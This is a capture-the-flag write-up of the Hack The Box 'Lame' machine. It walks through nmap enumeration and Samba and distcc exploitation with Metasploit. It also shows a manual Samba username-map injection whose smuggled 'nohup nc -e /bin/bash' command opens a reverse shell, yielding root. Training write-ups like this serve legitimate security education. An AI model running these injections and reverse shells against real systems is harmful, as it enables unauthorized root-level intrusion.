Hi Hackers Welcome Back, Today we are going to look at Hack The Box Blue Machine.
Info Table
Title
Lame
Category
Hack The Box
OS
Linux
Difficulty
Easy
Maker
Kill Chain Summery
While enumerating ports and services we can able to find the service, which is vulnerable to infamous CVE - 2007-2447 & 2004-2687. Samba vulnerabilities which can be easily exploited with publicly available scripts and Metasploit.
Mind Map
Recon
we run a quick initial nmap scan to see which ports are open and which services are running on those ports.
All port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $nmap -Pn -p- 10.129.99.174 -oN ap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 17:46 IST
Stats: 0:08:33 elapsed;0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.62% done; ETC: 17:58 (0:03:33 remaining)Nmap scan report for 10.129.99.174
Host is up (0.34s latency).
Not shown: 65530 filtered tcp ports (no-response)PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Nmap done: 1 IP address (1 host up) scanned in 1297.12 seconds1
─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $nmap -Pn -sV -sC -A 10.129.99.174 -oN scsva
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 17:39 IST
Nmap scan report for 10.129.99.174
Host is up (0.34s latency).
Not shown: 996 filtered tcp ports (no-response)PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey:
|1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-06-03T08:10:34-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)|_clock-skew: mean: 2h00m27s, deviation: 2h49m46s, median: 24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
1
2
3
4
5
6
7
8
9
10
11
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $nmap -Pn -A -T4 -p 3632 10.129.99.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-04 02:22 IST
Nmap scan report for 10.129.99.174
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
Service and its Version
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Enumeration port 21
The version of the vsftp is vulnerable to CVE: CVE-2011-2523, i have tried both metasploit and public exploit but nothing helped me probably they might be patched,
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $ftp 10.129.99.174
Connected to 10.129.99.174.
220(vsFTPd 2.3.4)Name (10.129.99.174:atom): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 20655344096 Mar 172010 .
drwxr-xr-x 20655344096 Mar 172010 ..
226 Directory send OK.
[msf](Jobs:0 Agents:0) >> search Username script
Matching Modules================# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- -----------
0 auxiliary/gather/c2s_dvr_password_disclosure 2016-08-19 normal No C2S DVR Management Password Disclosure
1 exploit/windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection
2 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
3 exploit/linux/http/grandstream_ucm62xx_sendemail_rce 2020-03-23 excellent Yes Grandstream UCM62xx IP PBX sendPasswordEmail RCE
4 auxiliary/gather/ipcamera_password_disclosure 2016-08-16 normal No JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure
5 exploit/linux/local/su_login 1971-11-03 normal Yes Login to Another User with Su on Linux / Unix Systems
6 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
7 auxiliary/scanner/oracle/oracle_login normal No Oracle RDBMS Login Utility
8 auxiliary/server/pxeexploit normal No PXE Boot Exploit Server
9 exploit/multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution
10 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
11 exploit/linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWinds LEM Default SSH Password Remote Code Execution
12 auxiliary/scanner/http/squiz_matrix_user_enum 2011-11-08 normal No Squiz Matrix User Enumeration Scanner
13 exploit/windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence
14 post/windows/manage/pxeexploit normal No Windows Manage PXE Exploit Server
15 auxiliary/gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal Yes WordPress Ultimate CSV Importer User Table Extract
Interact with a module by name or index. For example info 15, use 15 or use auxiliary/gather/wp_ultimate_csv_importer_user_extract
[msf](Jobs:0 Agents:0) >> use 10[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set rhost 10.129.101.251
rhost=> 10.129.101.251
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost 10.10.14.33
lhost=> 10.10.14.33
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run
[*] Started reverse TCP handler on 10.10.14.33:4444
[*] Command shell session 1 opened (10.10.14.33:4444 -> 10.129.101.251:47514 ) at 2022-06-07 15:03:37 +0530
whoami
root
id
uid=0(root)gid=0(root)
Manual Method
Enum samba
1
2
3
4
5
6
7
8
9
10
─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──╼ $smbmap -H 10.129.101.251
[+] IP: 10.129.101.251:445 Name: 10.129.101.251
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame] │┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $smbclient -N //10.129.101.251/tmp/ --option='client min protocol=NT1' │└──_ $nc -lvnp 4444Anonymous login successful │listening on [any]4444 ...
Try "help" to get a list of possible commands. │connect to [10.10.14.33] from (UNKNOWN)[10.129.101.251]38753smb: \> dir │whoami
. D 0 Tue Jun 7 15:06:51 2022 │root
.. DR 0 Sat Oct 31 12:03:58 2020 │id
5582.jsvc_up R 0 Tue Jun 7 07:49:52 2022 │uid=0(root)gid=0(root) .ICE-unix DH 0 Tue Jun 7 07:48:41 2022 │
vmware-root DR 0 Tue Jun 7 07:49:47 2022 │
.X11-unix DH 0 Tue Jun 7 07:49:06 2022 │
.X0-lock HR 11 Tue Jun 7 07:49:06 2022 │
vgauthsvclog.txt.0 R 1600 Tue Jun 7 07:48:40 2022 │
│
7282168 blocks of size 1024. 5384924 blocks available │
smb: \> logon _./=`nohup nc -e /bin/bash 10.10.14.33 4444`" │
session setup failed: NT_STATUS_LOGON_FAILURE │
smb: \> logon _./=`nohup nc -e /bin/bash 10.10.14.33 4444`" │
session setup failed: NT_STATUS_LOGON_FAILURE │
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.33 4444`" │
Password: │
│
Ennum and Exploit 3632
1
2
3
4
5
6
7
8
9
10
11
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]└──_ $nmap -Pn -p 3632 -sV --script vulners 10.129.101.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-06 18:24 IST
Nmap scan report for 10.129.101.147
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
[msf](Jobs:0 Agents:0) >> search distccd
Matching Modules================# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
[msf](Jobs:0 Agents:0) >> use 0[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> show payloads
Compatible Payloads===================# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)6 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)7 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)8 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)9 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)10 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)11 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)12 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)13 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set payload 5payload=> cmd/unix/reverse
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set rhost 10.129.101.251
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set lhost 10.10.14.33
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.129.101.251 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3632 yes The target port (TCP)Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.33 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> run
[*] Started reverse TCP double handler on 10.10.14.33:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo IfVVyVugXAMKqtcu;[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (10.10.14.33:4444 -> 10.129.101.251:55594 ) at 2022-06-07 14:26:29 +0530
Shell Banner:
IfVVyVugXAMKqtcu
-----
whoami
daemon
id
uid=1(daemon)gid=1(daemon)groups=1(daemon)
